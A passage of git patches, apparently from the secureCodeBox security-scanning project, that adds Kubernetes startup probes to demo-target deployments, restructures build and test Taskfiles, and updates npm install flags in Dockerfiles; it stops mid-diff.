a/demo-targets/old-joomla/templates/deployment.yaml b/demo-targets/old-joomla/templates/deployment.yaml index 4524722c19..e50f491c93 100644 --- a/demo-targets/old-joomla/templates/deployment.yaml +++ b/demo-targets/old-joomla/templates/deployment.yaml @@ -38,6 +38,13 @@ spec: - name: http containerPort: 80 protocol: TCP + startupProbe: + httpGet: + path: / + port: http + periodSeconds: 3 + failureThreshold: 30 + successThreshold: 1 livenessProbe: httpGet: path: / diff --git a/demo-targets/old-typo3/templates/deployment.yaml b/demo-targets/old-typo3/templates/deployment.yaml index 83fdcf5095..508553b62e 100644 --- a/demo-targets/old-typo3/templates/deployment.yaml +++ b/demo-targets/old-typo3/templates/deployment.yaml @@ -38,6 +38,13 @@ spec: - name: http containerPort: 80 protocol: TCP + startupProbe: + httpGet: + path: / + port: http + periodSeconds: 3 + failureThreshold: 30 + successThreshold: 1 livenessProbe: httpGet: path: / diff --git a/demo-targets/old-wordpress/templates/deployment.yaml b/demo-targets/old-wordpress/templates/deployment.yaml index 1ccc7fc6be..f38474ce2f 100644 --- a/demo-targets/old-wordpress/templates/deployment.yaml +++ b/demo-targets/old-wordpress/templates/deployment.yaml @@ -38,6 +38,13 @@ spec: - name: http containerPort: 80 protocol: TCP + startupProbe: + httpGet: + path: / + port: http + periodSeconds: 3 + failureThreshold: 30 + successThreshold: 1 livenessProbe: httpGet: path: / diff --git a/demo-targets/swagger-petstore/templates/deployment.yaml b/demo-targets/swagger-petstore/templates/deployment.yaml index 9dd9c79ee3..7df7afc106 100644 --- a/demo-targets/swagger-petstore/templates/deployment.yaml +++ b/demo-targets/swagger-petstore/templates/deployment.yaml @@ -52,6 +52,13 @@ spec: - name: http containerPort: 8080 protocol: TCP + startupProbe: + httpGet: + path: / + port: http + periodSeconds: 3 + failureThreshold: 30 + successThreshold: 1 livenessProbe: httpGet: path: / diff --git a/demo-targets/unsafe-https/templates/deployment.yaml b/demo-targets/unsafe-https/templates/deployment.yaml index 91daadeb02..1b343a6d73 100644 --- a/demo-targets/unsafe-https/templates/deployment.yaml +++ b/demo-targets/unsafe-https/templates/deployment.yaml @@ -38,6 +38,12 @@ spec: - name: https containerPort: 443 protocol: TCP + startupProbe: + tcpSocket: + port: 443 + periodSeconds: 3 + failureThreshold: 30 + successThreshold: 1 livenessProbe: tcpSocket: port: 443 diff --git a/demo-targets/vulnerable-log4j/templates/deployment.yaml b/demo-targets/vulnerable-log4j/templates/deployment.yaml index 96d7ae48d2..70a546424f 100644 --- a/demo-targets/vulnerable-log4j/templates/deployment.yaml +++ b/demo-targets/vulnerable-log4j/templates/deployment.yaml @@ -38,6 +38,13 @@ spec: - name: http containerPort: 8080 protocol: TCP + startupProbe: + httpGet: + path: / + port: http + periodSeconds: 3 + failureThreshold: 30 + successThreshold: 1 resources: {{- toYaml .Values.resources | nindent 12 }} {{- with .Values.nodeSelector }} From abe50029351c0082d4ebb5cbfcc3ea01ed060e03 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Tue, 1 Jul 2025 22:32:41 +0200 Subject: [PATCH 038/137] Remove initial delays from demo-apps, now handled by the startup probe --- demo-targets/bodgeit/templates/deployment.yaml | 2 -- demo-targets/http-webhook/templates/deployment.yaml | 11 +++++++++++ demo-targets/old-wordpress/templates/deployment.yaml | 2 -- .../swagger-petstore/templates/deployment.yaml | 2 -- .../vulnerable-log4j/templates/deployment.yaml | 8 ++++++++ 5 files changed, 19 insertions(+), 6 deletions(-) diff --git a/demo-targets/bodgeit/templates/deployment.yaml b/demo-targets/bodgeit/templates/deployment.yaml index 18397ff018..e165402d5b 100644 --- a/demo-targets/bodgeit/templates/deployment.yaml +++ b/demo-targets/bodgeit/templates/deployment.yaml @@ -50,12 +50,10 @@ spec: httpGet: path: / port: http - initialDelaySeconds: 60 readinessProbe: httpGet: path: / port: http - initialDelaySeconds: 60 periodSeconds: 10 failureThreshold: 3 successThreshold: 1 diff --git a/demo-targets/http-webhook/templates/deployment.yaml b/demo-targets/http-webhook/templates/deployment.yaml index 19b09d3075..515355bdd1 100644 --- a/demo-targets/http-webhook/templates/deployment.yaml +++ b/demo-targets/http-webhook/templates/deployment.yaml @@ -56,6 +56,17 @@ spec: periodSeconds: 3 failureThreshold: 30 successThreshold: 1 + livenessProbe: + httpGet: + path: / + port: http + readinessProbe: + httpGet: + path: / + port: http + periodSeconds: 10 + failureThreshold: 3 + successThreshold: 1 resources: {{- toYaml .Values.resources | nindent 12 }} {{- with .Values.nodeSelector }} diff --git a/demo-targets/old-wordpress/templates/deployment.yaml b/demo-targets/old-wordpress/templates/deployment.yaml index f38474ce2f..bfb263ca4e 100644 --- a/demo-targets/old-wordpress/templates/deployment.yaml +++ b/demo-targets/old-wordpress/templates/deployment.yaml @@ -49,12 +49,10 @@ spec: httpGet: path: / port: http - initialDelaySeconds: 60 readinessProbe: httpGet: path: / port: http - initialDelaySeconds: 60 periodSeconds: 10 failureThreshold: 3 successThreshold: 1 diff --git a/demo-targets/swagger-petstore/templates/deployment.yaml b/demo-targets/swagger-petstore/templates/deployment.yaml index 7df7afc106..ca48aacbfb 100644 --- a/demo-targets/swagger-petstore/templates/deployment.yaml +++ b/demo-targets/swagger-petstore/templates/deployment.yaml @@ -63,12 +63,10 @@ spec: httpGet: path: / port: http - initialDelaySeconds: 60 readinessProbe: httpGet: path: / port: http - initialDelaySeconds: 60 periodSeconds: 10 failureThreshold: 3 successThreshold: 1 diff --git a/demo-targets/vulnerable-log4j/templates/deployment.yaml b/demo-targets/vulnerable-log4j/templates/deployment.yaml index 70a546424f..aeecb3d3b5 100644 --- a/demo-targets/vulnerable-log4j/templates/deployment.yaml +++ b/demo-targets/vulnerable-log4j/templates/deployment.yaml @@ -45,6 +45,14 @@ spec: periodSeconds: 3 failureThreshold: 30 successThreshold: 1 + livenessProbe: + httpGet: + path: / + port: http + readinessProbe: + httpGet: + path: / + port: http resources: {{- toYaml .Values.resources | nindent 12 }} {{- with .Values.nodeSelector }} From cf23ef1f5816d4b7c3f3c3f35d63cc260474099e Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Tue, 1 Jul 2025 22:40:27 +0200 Subject: [PATCH 039/137] Optimize demo app installs to not run twice on concecutive runs --- demo-targets/Taskfile.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/demo-targets/Taskfile.yaml b/demo-targets/Taskfile.yaml index b2e0d2f1d6..0a0546d496 100644 --- a/demo-targets/Taskfile.yaml +++ b/demo-targets/Taskfile.yaml @@ -3,6 +3,8 @@ version: "3" tasks: deploy:app: internal: true + status: + - helm --namespace demo-targets get all {{ .app }} cmds: - helm --namespace demo-targets upgrade --create-namespace --install {{ .app }} {{ .TASKFILE_DIR }}/{{ .app }}/ --wait From 3e90c4644dff20c1674cadd95876e100f167dd0e Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Tue, 1 Jul 2025 22:40:57 +0200 Subject: [PATCH 040/137] Restructure prepare steps to be better linked in from scanner tasks --- Taskfile.yaml | 83 +++++++++++++++++++++++++++++++++--------- scanners/Taskfile.yaml | 44 ++++++++++++++++------ 2 files changed, 99 insertions(+), 28 deletions(-) diff --git a/Taskfile.yaml b/Taskfile.yaml index e0ee3024e8..70319da434 100644 --- a/Taskfile.yaml +++ b/Taskfile.yaml @@ -2,37 +2,86 @@ version: "3" env: IMG_NS: securecodebox + IMG_TAG: + sh: 'echo "sha-$(git rev-parse --short HEAD)"' tasks: - prepare-testing-env: - env: - IMG_TAG: - sh: 'echo "sha-$(git rev-parse --short HEAD)"' + create-kind-cluster: cmds: - - 'echo "Deleting existing kind cluster for testing environment"' - - kind delete cluster --name testing-env || true - 'echo "Starting kind cluster for testing environment"' - kind create cluster --name testing-env - - 'echo "Building images for operator and lurker with tag ${IMG_TAG}"' - - cd operator/ && docker build -t ${IMG_NS}/operator:${IMG_TAG} . - - cd lurker/ && docker build -t ${IMG_NS}/lurker:${IMG_TAG} . + status: + - kind get clusters | grep testing-env || exit 1 + + build-operator-image: + cmds: + - 'echo "Building operator image with tag ${IMG_TAG}"' + - docker build -t ${IMG_NS}/operator:${IMG_TAG} {{ .TASKFILE_DIR }}/operator + status: + - docker images | grep "${IMG_NS}/operator" | grep "${IMG_TAG}" + + build-lurker-image: + cmds: + - 'echo "Building lurker image with tag ${IMG_TAG}"' + - docker build -t ${IMG_NS}/lurker:${IMG_TAG} {{ .TASKFILE_DIR }}/lurker + status: + - docker images | grep "${IMG_NS}/lurker" | grep "${IMG_TAG}" + + load-operator-image: + deps: [build-operator-image] + cmds: - kind load docker-image ${IMG_NS}/operator:${IMG_TAG} --name testing-env + status: + - kind get images --name testing-env | grep "${IMG_NS}/operator:${IMG_TAG}" || exit 1 + + load-lurker-image: + deps: [build-lurker-image] + cmds: - kind load docker-image ${IMG_NS}/lurker:${IMG_TAG} --name testing-env + status: + - kind get images --name testing-env | grep "${IMG_NS}/lurker:${IMG_TAG}" || exit 1 + + deploy-operator: + deps: [load-operator-image, load-lurker-image] + cmds: - 'echo "Deploying secureCodeBox operator to the testing environment"' - kubectl config use-context kind-testing-env - kubectl create namespace integration-tests || true - - kubectl create namespace securecodebox-system || true - | - helm -n securecodebox-system upgrade --install securecodebox-operator ./operator --wait \ + helm -n securecodebox-system upgrade --create-namespace --install securecodebox-operator {{ .TASKFILE_DIR }}/operator --wait \ --set="image.repository=docker.io/${IMG_NS}/operator" \ --set="image.tag=${IMG_TAG}" \ --set="image.pullPolicy=IfNotPresent" \ --set="lurker.image.repository=docker.io/${IMG_NS}/lurker" \ --set="lurker.image.tag=${IMG_TAG}" \ --set="lurker.image.pullPolicy=IfNotPresent" - - | - echo "Building parser-sdk images with tag ${IMG_TAG}" - docker build -t securecodebox/parser-sdk-nodejs:${IMG_TAG} ./parser-sdk/nodejs - - | - echo "Building hook-sdk images with tag ${IMG_TAG}" - docker build -t securecodebox/hook-sdk-nodejs:${IMG_TAG} ./hook-sdk/nodejs + status: + - kubectl get deployment -n securecodebox-system securecodebox-operator | grep "1/1" || exit 1 + + build-parser-sdk-image: + cmds: + - 'echo "Building parser-sdk images with tag ${IMG_TAG}"' + - docker build -t securecodebox/parser-sdk-nodejs:${IMG_TAG} {{ .TASKFILE_DIR }}/parser-sdk/nodejs + status: + - docker images | grep "securecodebox/parser-sdk-nodejs" | grep "${IMG_TAG}" + + build-hook-sdk-image: + cmds: + - 'echo "Building hook-sdk images with tag ${IMG_TAG}"' + - docker build -t securecodebox/hook-sdk-nodejs:${IMG_TAG} {{ .TASKFILE_DIR }}/hook-sdk/nodejs + status: + - docker images | grep "securecodebox/hook-sdk-nodejs" | grep "${IMG_TAG}" + + prepare-testing-env: + desc: "Prepare the testing environment by running all required tasks" + cmds: + - task: create-kind-cluster + - task: deploy-operator + + cleanup-testing-env: + desc: "Cleanup the testing environment by deleting the kind cluster" + cmds: + - 'echo "Cleaning up testing environment"' + - kind delete cluster --name testing-env + status: + - kind get clusters | grep -q 'testing-env' || exit 0 diff --git a/scanners/Taskfile.yaml b/scanners/Taskfile.yaml index c56b12cb80..e2f7c2498c 100644 --- a/scanners/Taskfile.yaml +++ b/scanners/Taskfile.yaml @@ -4,6 +4,9 @@ includes: demo-apps: taskfile: ../demo-targets/Taskfile.yaml internal: true + core: + taskfile: ../Taskfile.yaml + internal: true vars: # demo apps required for integration tests, e.g. "bodgeit juice-shop", etc. reference the demo apps in the demo-targets/Taskfile.yaml @@ -20,19 +23,26 @@ env: tasks: build: desc: Build the Docker image for the {{ .scannerName }} scanner + status: + - docker images | grep -q "docker.io/securecodebox/scanner-{{ .scannerName }}:${IMG_TAG}" || false + - docker images | grep -q "docker.io/securecodebox/parser-{{ .scannerName }}:${IMG_TAG}" || false + preconditions: + - msg: "Docker is not running, please start Docker first" + sh: "docker info >/dev/null 2>&1 || false" + deps: + - core:build-parser-sdk-image cmds: - | - # if the folder has a scanner/ dir assuming it is a custom scanner - if [ -d "{{ .ROOT_DIR }}/scanner/" ]; then - echo "Building custom scanner image for {{ .scannerName }} with tag ${IMG_TAG}" - docker build -t docker.io/securecodebox/scanner-{{ .scannerName }}:${IMG_TAG} \ - --build-arg=scannerVersion=$(yq eval .appVersion {{ .ROOT_DIR }}/Chart.yaml) \ - --build-arg=baseImageTag=${IMG_TAG} \ - {{ .ROOT_DIR }}/scanner/ - kind load docker-image --name testing-env docker.io/securecodebox/scanner-{{ .scannerName }}:${IMG_TAG} - else + {{ if eq "true" .hasCustomScanner -}} + echo "Building custom scanner image for {{ .scannerName }} with tag ${IMG_TAG}" + docker build -t docker.io/securecodebox/scanner-{{ .scannerName }}:${IMG_TAG} \ + --build-arg=scannerVersion=$(yq eval .appVersion {{ .ROOT_DIR }}/Chart.yaml) \ + --build-arg=baseImageTag=${IMG_TAG} \ + {{ .ROOT_DIR }}/scanner/ + kind load docker-image --name testing-env docker.io/securecodebox/scanner-{{ .scannerName }}:${IMG_TAG} + {{ else -}} echo "No custom scanner image defined, assuming scanner doen't need to be build" - fi + {{ end -}} - | echo "Building parser image for {{ .scannerName }} with tag ${IMG_TAG}" docker build -t docker.io/securecodebox/parser-{{ .scannerName }}:${IMG_TAG} \ @@ -45,6 +55,11 @@ tasks: silent: true deploy: desc: Deploy the {{ .scannerName }} scanner to the testing environment + deps: + - core:prepare-testing-env + - build + status: + - helm ls {{ .scannerName }} -n integration-tests | grep -q '{{ .scannerName }}' || false cmds: - 'echo "Deploying {{ .scannerName }} to the testing environment"' - task: predeploy @@ -89,6 +104,8 @@ tasks: bun test {{ .ROOT_DIR }}/parser/ test:integration: desc: Run integration tests for the {{ .scannerName }} scanner + deps: + - deploy preconditions: - msg: "parser-sdk dependencies are not installed, run 'task test:setup' first" sh: "[ -d {{ .ROOT_DIR }}/../../parser-sdk/nodejs/node_modules ]" @@ -104,7 +121,12 @@ tasks: sh: "kubectl get scantypes {{ .scannerName }} -n integration-tests | grep -q '{{ .scannerName }}' || false" cmds: - - 'echo "Deploying demo applications required for integration tests for {{ .scannerName }}: {{ .demoAppsRequiredForIntegrationTests }}"' + - | + {{ if eq "" .demoAppsRequiredForIntegrationTests -}} + echo "No demo applications required for integration tests for {{ .scannerName }}" + {{ else -}} + echo "Deploying demo applications required for integration tests for {{ .scannerName }}: {{ .demoAppsRequiredForIntegrationTests }}" + {{ end -}} - for: var: demoAppsRequiredForIntegrationTests task: demo-apps:deploy:{{ .ITEM }} From 5d77304d89ba8ad84c5eed84bda56e2afb43255d Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Tue, 1 Jul 2025 22:46:37 +0200 Subject: [PATCH 041/137] Add helm unit tests to scanner task file --- scanners/Taskfile.yaml | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/scanners/Taskfile.yaml b/scanners/Taskfile.yaml index e2f7c2498c..e5df51bcc9 100644 --- a/scanners/Taskfile.yaml +++ b/scanners/Taskfile.yaml @@ -143,8 +143,16 @@ tasks: - echo "Running integration tests for {{ .scannerName }}" - bun test {{ .ROOT_DIR }}/integration-tests/ + test:helm: + desc: Run helm tests for the {{ .scannerName }} scanner + preconditions: + - msg: "Helm unittest plugin is not installed, you need to install it first. See: https://github.com/helm-unittest/helm-unittest/" + sh: "helm plugin list | grep -q 'unittest' || false" + cmds: + - helm unittest {{ .ROOT_DIR }} test: desc: Run all tests for the {{ .scannerName }} scanner cmds: - task test:unit + - task test:helm - task test:integration From 7aab16184a608bf85ca000b940ce327a9f28da85 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Tue, 1 Jul 2025 22:52:16 +0200 Subject: [PATCH 042/137] Fix npm warning --- .../docs/contributing/integrating-a-hook/dockerfile.md | 2 +- .../docs/contributing/integrating-a-scanner/parser-dir.md | 2 +- hook-sdk/nodejs/Dockerfile | 2 +- hooks/cascading-scans/hook/Dockerfile | 2 +- hooks/finding-post-processing/hook/Dockerfile | 2 +- hooks/generic-webhook/hook/Dockerfile | 2 +- hooks/notification/hook/Dockerfile | 2 +- hooks/persistence-azure-monitor/hook/Dockerfile | 2 +- hooks/persistence-dependencytrack/hook/Dockerfile | 2 +- hooks/persistence-elastic/hook/Dockerfile | 2 +- hooks/update-field-hook/hook/Dockerfile | 2 +- parser-sdk/nodejs/Dockerfile | 2 +- scanners/amass/parser/Dockerfile | 2 +- scanners/gitleaks/parser/Dockerfile | 2 +- scanners/ncrack/parser/Dockerfile | 2 +- scanners/nmap/parser/Dockerfile | 2 +- scanners/sslyze/parser/Dockerfile | 2 +- scanners/zap-automation-framework/parser/Dockerfile | 2 +- 18 files changed, 18 insertions(+), 18 deletions(-) diff --git a/documentation/docs/contributing/integrating-a-hook/dockerfile.md b/documentation/docs/contributing/integrating-a-hook/dockerfile.md index e8b975fdd6..56bbb9db2d 100644 --- a/documentation/docs/contributing/integrating-a-hook/dockerfile.md +++ b/documentation/docs/contributing/integrating-a-hook/dockerfile.md @@ -16,7 +16,7 @@ FROM node:22-alpine as build RUN mkdir -p /home/app WORKDIR /home/app COPY package.json package-lock.json ./ -RUN npm ci --production +RUN npm ci --omit=dev FROM securecodebox/hook-sdk-nodejs:${baseImageTag:-latest} WORKDIR /home/app/hook-wrapper/hook/ diff --git a/documentation/docs/contributing/integrating-a-scanner/parser-dir.md b/documentation/docs/contributing/integrating-a-scanner/parser-dir.md index 58dfcac0c0..e0e01c0e80 100644 --- a/documentation/docs/contributing/integrating-a-scanner/parser-dir.md +++ b/documentation/docs/contributing/integrating-a-scanner/parser-dir.md @@ -20,7 +20,7 @@ FROM node:22-alpine as build RUN mkdir -p /home/app WORKDIR /home/app COPY package.json package-lock.json ./ -RUN npm ci --production +RUN npm ci --omit=dev FROM securecodebox/parser-sdk-nodejs:${baseImageTag:-latest} WORKDIR /home/app/parser-wrapper/parser/ diff --git a/hook-sdk/nodejs/Dockerfile b/hook-sdk/nodejs/Dockerfile index 2c74a94775..270e9b83fc 100644 --- a/hook-sdk/nodejs/Dockerfile +++ b/hook-sdk/nodejs/Dockerfile @@ -5,7 +5,7 @@ FROM node:22-alpine AS build WORKDIR /home/app COPY package.json package-lock.json ./ -RUN npm ci --production +RUN npm ci --omit=dev FROM node:22-alpine ARG NODE_ENV diff --git a/hooks/cascading-scans/hook/Dockerfile b/hooks/cascading-scans/hook/Dockerfile index 1d0c1776e2..dbb0eff46e 100644 --- a/hooks/cascading-scans/hook/Dockerfile +++ b/hooks/cascading-scans/hook/Dockerfile @@ -8,7 +8,7 @@ FROM node:22-alpine AS install RUN mkdir -p /home/app WORKDIR /home/app COPY package.json package-lock.json ./ -RUN npm ci --production +RUN npm ci --omit=dev FROM node:22-alpine AS build RUN mkdir -p /home/app diff --git a/hooks/finding-post-processing/hook/Dockerfile b/hooks/finding-post-processing/hook/Dockerfile index 2f59d82b14..dc64c7bf24 100644 --- a/hooks/finding-post-processing/hook/Dockerfile +++ b/hooks/finding-post-processing/hook/Dockerfile @@ -8,7 +8,7 @@ FROM node:22-alpine AS build RUN mkdir -p /home/app WORKDIR /home/app COPY package.json package-lock.json ./ -RUN npm ci --production +RUN npm ci --omit=dev FROM ${namespace:-securecodebox}/hook-sdk-nodejs:${baseImageTag:-latest} WORKDIR /home/app/hook-wrapper/hook/ diff --git a/hooks/generic-webhook/hook/Dockerfile b/hooks/generic-webhook/hook/Dockerfile index 2f59d82b14..dc64c7bf24 100644 --- a/hooks/generic-webhook/hook/Dockerfile +++ b/hooks/generic-webhook/hook/Dockerfile @@ -8,7 +8,7 @@ FROM node:22-alpine AS build RUN mkdir -p /home/app WORKDIR /home/app COPY package.json package-lock.json ./ -RUN npm ci --production +RUN npm ci --omit=dev FROM ${namespace:-securecodebox}/hook-sdk-nodejs:${baseImageTag:-latest} WORKDIR /home/app/hook-wrapper/hook/ diff --git a/hooks/notification/hook/Dockerfile b/hooks/notification/hook/Dockerfile index f463dc22d1..eb7961a9ea 100644 --- a/hooks/notification/hook/Dockerfile +++ b/hooks/notification/hook/Dockerfile @@ -8,7 +8,7 @@ FROM node:22-alpine AS install RUN mkdir -p /home/app WORKDIR /home/app COPY package.json package-lock.json ./ -RUN npm ci --production +RUN npm ci --omit=dev FROM node:22-alpine AS build RUN mkdir -p /home/app diff --git a/hooks/persistence-azure-monitor/hook/Dockerfile b/hooks/persistence-azure-monitor/hook/Dockerfile index f1bd50720f..7ba93073c5 100644 --- a/hooks/persistence-azure-monitor/hook/Dockerfile +++ b/hooks/persistence-azure-monitor/hook/Dockerfile @@ -8,7 +8,7 @@ FROM node:22-alpine AS build RUN mkdir -p /home/app WORKDIR /home/app COPY package.json package-lock.json ./ -RUN npm ci --production +RUN npm ci --omit=dev FROM ${namespace:-securecodebox}/hook-sdk-nodejs:${baseImageTag:-latest} WORKDIR /home/app/hook-wrapper/hook/ diff --git a/hooks/persistence-dependencytrack/hook/Dockerfile b/hooks/persistence-dependencytrack/hook/Dockerfile index 2f5ccf1f52..11e945113c 100644 --- a/hooks/persistence-dependencytrack/hook/Dockerfile +++ b/hooks/persistence-dependencytrack/hook/Dockerfile @@ -8,7 +8,7 @@ FROM node:22-alpine AS build RUN mkdir -p /home/app WORKDIR /home/app COPY package.json package-lock.json ./ -RUN npm ci --production +RUN npm ci --omit=dev FROM ${namespace:-securecodebox}/hook-sdk-nodejs:${baseImageTag:-latest} WORKDIR /home/app/hook-wrapper/hook/ diff --git a/hooks/persistence-elastic/hook/Dockerfile b/hooks/persistence-elastic/hook/Dockerfile index 2f59d82b14..dc64c7bf24 100644 --- a/hooks/persistence-elastic/hook/Dockerfile +++ b/hooks/persistence-elastic/hook/Dockerfile @@ -8,7 +8,7 @@ FROM node:22-alpine AS build RUN mkdir -p /home/app WORKDIR /home/app COPY package.json package-lock.json ./ -RUN npm ci --production +RUN npm ci --omit=dev FROM ${namespace:-securecodebox}/hook-sdk-nodejs:${baseImageTag:-latest} WORKDIR /home/app/hook-wrapper/hook/ diff --git a/hooks/update-field-hook/hook/Dockerfile b/hooks/update-field-hook/hook/Dockerfile index 2f59d82b14..dc64c7bf24 100644 --- a/hooks/update-field-hook/hook/Dockerfile +++ b/hooks/update-field-hook/hook/Dockerfile @@ -8,7 +8,7 @@ FROM node:22-alpine AS build RUN mkdir -p /home/app WORKDIR /home/app COPY package.json package-lock.json ./ -RUN npm ci --production +RUN npm ci --omit=dev FROM ${namespace:-securecodebox}/hook-sdk-nodejs:${baseImageTag:-latest} WORKDIR /home/app/hook-wrapper/hook/ diff --git a/parser-sdk/nodejs/Dockerfile b/parser-sdk/nodejs/Dockerfile index 4dab56012c..bd9bae86a6 100644 --- a/parser-sdk/nodejs/Dockerfile +++ b/parser-sdk/nodejs/Dockerfile @@ -5,7 +5,7 @@ FROM node:22-alpine AS build WORKDIR /home/app COPY package.json package-lock.json ./ -RUN npm ci --production +RUN npm ci --omit=dev FROM node:22-alpine ARG NODE_ENV diff --git a/scanners/amass/parser/Dockerfile b/scanners/amass/parser/Dockerfile index 6aff6d3bd7..0dbef28c20 100644 --- a/scanners/amass/parser/Dockerfile +++ b/scanners/amass/parser/Dockerfile @@ -8,7 +8,7 @@ FROM node:22-alpine AS build RUN mkdir -p /home/app WORKDIR /home/app COPY package.json package-lock.json ./ -RUN npm ci --production +RUN npm ci --omit=dev FROM ${namespace:-securecodebox}/parser-sdk-nodejs:${baseImageTag:-latest} WORKDIR /home/app/parser-wrapper/parser/ diff --git a/scanners/gitleaks/parser/Dockerfile b/scanners/gitleaks/parser/Dockerfile index ee2cd5a9d3..159649e6ba 100644 --- a/scanners/gitleaks/parser/Dockerfile +++ b/scanners/gitleaks/parser/Dockerfile @@ -11,7 +11,7 @@ ARG baseImageTag # RUN mkdir -p /home/app # WORKDIR /home/app # COPY package.json package-lock.json ./ -# RUN npm ci --production +# RUN npm ci --omit=dev FROM ${namespace:-securecodebox}/parser-sdk-nodejs:${baseImageTag:-latest} WORKDIR /home/app/parser-wrapper/parser/ diff --git a/scanners/ncrack/parser/Dockerfile b/scanners/ncrack/parser/Dockerfile index 6aff6d3bd7..0dbef28c20 100644 --- a/scanners/ncrack/parser/Dockerfile +++ b/scanners/ncrack/parser/Dockerfile @@ -8,7 +8,7 @@ FROM node:22-alpine AS build RUN mkdir -p /home/app WORKDIR /home/app COPY package.json package-lock.json ./ -RUN npm ci --production +RUN npm ci --omit=dev FROM ${namespace:-securecodebox}/parser-sdk-nodejs:${baseImageTag:-latest} WORKDIR /home/app/parser-wrapper/parser/ diff --git a/scanners/nmap/parser/Dockerfile b/scanners/nmap/parser/Dockerfile index 6aff6d3bd7..0dbef28c20 100644 --- a/scanners/nmap/parser/Dockerfile +++ b/scanners/nmap/parser/Dockerfile @@ -8,7 +8,7 @@ FROM node:22-alpine AS build RUN mkdir -p /home/app WORKDIR /home/app COPY package.json package-lock.json ./ -RUN npm ci --production +RUN npm ci --omit=dev FROM ${namespace:-securecodebox}/parser-sdk-nodejs:${baseImageTag:-latest} WORKDIR /home/app/parser-wrapper/parser/ diff --git a/scanners/sslyze/parser/Dockerfile b/scanners/sslyze/parser/Dockerfile index 6aff6d3bd7..0dbef28c20 100644 --- a/scanners/sslyze/parser/Dockerfile +++ b/scanners/sslyze/parser/Dockerfile @@ -8,7 +8,7 @@ FROM node:22-alpine AS build RUN mkdir -p /home/app WORKDIR /home/app COPY package.json package-lock.json ./ -RUN npm ci --production +RUN npm ci --omit=dev FROM ${namespace:-securecodebox}/parser-sdk-nodejs:${baseImageTag:-latest} WORKDIR /home/app/parser-wrapper/parser/ diff --git a/scanners/zap-automation-framework/parser/Dockerfile b/scanners/zap-automation-framework/parser/Dockerfile index 6aff6d3bd7..0dbef28c20 100644 --- a/scanners/zap-automation-framework/parser/Dockerfile +++ b/scanners/zap-automation-framework/parser/Dockerfile @@ -8,7 +8,7 @@ FROM node:22-alpine AS build RUN mkdir -p /home/app WORKDIR /home/app COPY package.json package-lock.json ./ -RUN npm ci --production +RUN npm ci --omit=dev FROM ${namespace:-securecodebox}/parser-sdk-nodejs:${baseImageTag:-latest} WORKDIR /home/app/parser-wrapper/parser/ From 54b240a5f9ed65a9be8eec616503469796a11a11 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Tue, 1 Jul 2025 23:13:36 +0200 Subject: [PATCH 043/137] Optimize test setup commands --- scanners/Taskfile.yaml | 47 +++++++++++++++++++++++++++++++----------- 1 file changed, 35 insertions(+), 12 deletions(-) diff --git a/scanners/Taskfile.yaml b/scanners/Taskfile.yaml index e5df51bcc9..ee5937648e 100644 --- a/scanners/Taskfile.yaml +++ b/scanners/Taskfile.yaml @@ -14,6 +14,8 @@ vars: # if the scanner uses a custom scanner container image which needs to be built. Usually false as we prefer to reference the official scanner container images hasCustomScanner: sh: 'if [ -d "{{ .ROOT_DIR }}/scanner/" ]; then echo "true"; else echo "false"; fi' + parserUsesNpmDependencies: + sh: 'if [ -f "{{ .ROOT_DIR }}/parser/package.json" ]; then echo "true"; else echo "false"; fi' # addtional cli args to pass to the helm install command which installs the scanner into the testing environment additionalHelmInstallArgsForScanner: '{{ .additionalHelmInstallArgsForScanner | default "" }}' env: @@ -75,22 +77,43 @@ tasks: --set="parser.image.tag=${IMG_TAG}" \ --set="parser.image.pullPolicy=Never" \ --wait - test:setup: - desc: Installs all the various dependencies needed to run the tests for the {{ .scannerName }} scanner + + # test:setup tasks + test:setup:parser-sdk: + internal: true + status: + - "[ -d {{ .ROOT_DIR }}/../../parser-sdk/nodejs/node_modules ] || false" cmds: - cd {{ .ROOT_DIR }}/../../parser-sdk/nodejs/ && bun install + test:setup:scanner-dir: + internal: true + status: + - "[ -d {{ .ROOT_DIR }}/../node_modules ] || false" + cmds: - cd {{ .ROOT_DIR }}/../ && bun install - - cd {{ .ROOT_DIR }}/../../tests/integration/ && bun install - - | - if [ -f {{ .ROOT_DIR }}/parser/package.json ]; then - echo "Installing parser dependencies for {{ .scannerName }}" - cd {{ .ROOT_DIR }}/parser/ && bun install - else - echo "No parser dependencies found for {{ .scannerName }}" - fi - silent: true + test:setup:test-helpers: + internal: true + status: + - "[ -d {{ .ROOT_DIR }}/../../tests/integration/node_modules ] || false" + cmds: + - cd {{ .ROOT_DIR }}/../../tests/integration && bun install + test:setup:parser-deps: + internal: true + status: + - '{{ if eq "true" .parserUsesNpmDependencies -}}[ -d {{ .ROOT_DIR }}/parser/node_modules ] || false{{ else -}}true{{ end -}}' + cmds: + - cd {{ .ROOT_DIR }}/parser/ && bun install + test:setup: + cmds: + - task: test:setup:parser-sdk + - task: test:setup:scanner-dir + - task: test:setup:test-helpers + - task: test:setup:parser-deps + test:unit: desc: Run unit tests for the {{ .scannerName }} scanner + deps: + - test:setup preconditions: - msg: "parser-sdk dependencies are not installed, run 'task test:setup' first" sh: "[ -d {{ .ROOT_DIR }}/../../parser-sdk/nodejs/node_modules ]" @@ -105,6 +128,7 @@ tasks: test:integration: desc: Run integration tests for the {{ .scannerName }} scanner deps: + - test:setup - deploy preconditions: - msg: "parser-sdk dependencies are not installed, run 'task test:setup' first" @@ -119,7 +143,6 @@ tasks: sh: "kubectl get pods -n securecodebox-system | grep -q 'securecodebox-operator' || false" - msg: "{{ .scannerName }} scan type is not deployed, run 'task build deploy' from scanner dir first" sh: "kubectl get scantypes {{ .scannerName }} -n integration-tests | grep -q '{{ .scannerName }}' || false" - cmds: - | {{ if eq "" .demoAppsRequiredForIntegrationTests -}} From 76ddf5bd743c6e63e9968ab5128eb996c352afed Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Tue, 1 Jul 2025 23:13:54 +0200 Subject: [PATCH 044/137] Try adopting scanner ci to task --- .github/workflows/ci.yaml | 76 +++++++++++---------------------------- 1 file changed, 21 insertions(+), 55 deletions(-) diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index 